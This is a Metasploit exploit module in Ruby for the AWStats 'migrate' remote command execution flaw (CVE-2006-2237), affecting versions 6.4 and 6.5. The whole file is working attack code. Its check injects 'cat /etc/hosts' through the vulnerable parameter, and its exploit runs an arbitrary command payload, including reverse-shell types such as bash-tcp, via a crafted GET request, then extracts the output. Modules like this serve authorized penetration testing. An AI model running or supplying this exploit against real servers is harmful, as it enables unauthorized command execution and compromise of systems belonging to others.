##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
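class MetasploitModule < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::HttpClient

  # Module metadata: name, description, references, payload constraints and
  # the two datastore options (URI to awstats.pl and the AWStats site name)
  # that both `check` and `exploit` interpolate into the `migrate` parameter.
  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'AWStats migrate Remote Command Execution',
        'Description' => %q{
          This module exploits an arbitrary command execution vulnerability in the
          AWStats CGI script. AWStats v6.4 and v6.5 are vulnerable. Perl based
          payloads are recommended with this module. The vulnerability is only
          present when AllowToUpdateStatsFromBrowser is enabled in the AWStats
          configuration file (non-default).
        },
        'Author' => [ 'aushack' ],
        'License' => MSF_LICENSE,
        'References' => [
          ['CVE', '2006-2237'],
          ['OSVDB', '25284'],
          ['BID', '17844'],
          ['URL', 'http://awstats.sourceforge.net/awstats_security_news.php'],
          ['EDB', '1755'],
        ],
        'Privileged' => false,
        'Payload' => {
          'DisableNops' => true,
          'Space' => 512,
          'Compat' =>
            {
              'PayloadType' => 'cmd cmd_bash',
              'RequiredCmd' => 'generic perl ruby python bash-tcp telnet',
            }
        },
        'Platform' => 'unix',
        'Arch' => ARCH_CMD,
        'Targets' => [[ 'Automatic', {}]],
        'DisclosureDate' => '2006-05-04',
        'DefaultTarget' => 0,
        'Notes' => {
          'Reliability' => UNKNOWN_RELIABILITY,
          'Stability' => UNKNOWN_STABILITY,
          'SideEffects' => UNKNOWN_SIDE_EFFECTS
        }
      )
    )

    register_options(
      [
        OptString.new('URI', [true, "The full URI path to awstats.pl", "/cgi-bin/awstats.pl"]),
        OptString.new('AWSITE', [true, "The AWStats config site name", "demo"]),
      ]
    )
  end

  # Vulnerability check.
  #
  # NOTE: this check is intrusive — it injects `cat /etc/hosts` through the
  # `migrate` parameter and looks for "localhost" in the response, so it
  # executes a command on the target rather than merely fingerprinting it.
  #
  # Returns CheckCode::Vulnerable when command output is reflected,
  # CheckCode::Unknown when the target does not answer at all (a timeout or
  # connection failure is not evidence of safety), and CheckCode::Safe
  # otherwise.
  def check
    probe = "|echo;cat /etc/hosts;echo|awstats#{Rex::Text.rand_text_numeric(6)}.#{datastore['AWSITE']}.txt"

    res = send_request_cgi({
      'uri' => normalize_uri(datastore['URI']),
      'vars_get' => { 'migrate' => probe }
    }, 25)

    # No response at all: we cannot conclude either way.
    return Exploit::CheckCode::Unknown unless res

    return Exploit::CheckCode::Vulnerable if res.body && res.body.include?('localhost')

    Exploit::CheckCode::Safe
  end

  # Delivers the command payload through the same injection point.
  #
  # The payload is run as `cd /tmp && <payload>` and wrapped between two
  # `echo YYY` markers so that any output it produces can be cut out of the
  # response body and shown to the operator.
  #
  # Side effect worth knowing: the entire command, payload included, travels
  # in a GET query string and will therefore most likely be recorded in the
  # target web server's access log.
  def exploit
    command = Rex::Text.uri_encode("cd /tmp &&" + payload.encoded)
    sploit = normalize_uri(datastore['URI']) + "?migrate=|echo;echo%20YYY;#{command};echo%20YYY;echo|awstats#{Rex::Text.rand_text_numeric(6)}.#{datastore['AWSITE']}.txt"

    # Raw request: the query string above is already encoded piecewise and
    # must not be re-encoded by the CGI helper.
    res = send_request_raw({
      'uri' => sploit,
      'method' => 'GET',
      'headers' =>
        {
          'Connection' => 'Close',
        }
    }, 25)

    unless res
      print_error("No response from the server")
      return
    end

    print_status("The server returned: #{res.code} #{res.message}")

    # Everything between the two marker lines is the payload's stdout.
    output = res.body.match(/YYY\n(.*)\nYYY/m)
    if output
      print_status("Command output from the server:")
      print("\n" + output[1] + "\n\n")
    else
      print_warning("This server may not be vulnerable")
    end
  end
end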